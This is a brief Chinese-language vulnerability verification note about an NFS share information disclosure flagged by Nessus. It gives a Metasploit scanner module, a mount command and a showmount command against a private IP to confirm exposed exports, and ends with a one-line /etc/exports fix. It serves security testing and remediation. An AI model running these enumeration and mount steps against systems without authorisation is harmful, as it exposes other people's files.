漏洞情況:
Nessus掃描到NFS共享信息泄露漏洞
漏洞驗證:
1、掃描驗證,確認漏洞存在,輸出共享目錄。
use auxiliary/scanner/nfs/nfsmount
2、將目標IP的目錄掛載到本地目錄。
mount -t nfs 192.168.99.23:/usr/sap/trans /tmp/test
3、指定NFS服務器輸出目錄列表
showmount -e 192.168.99.23
修復方式:
$ vim /etc/exports /data/share 10.1.1.1/32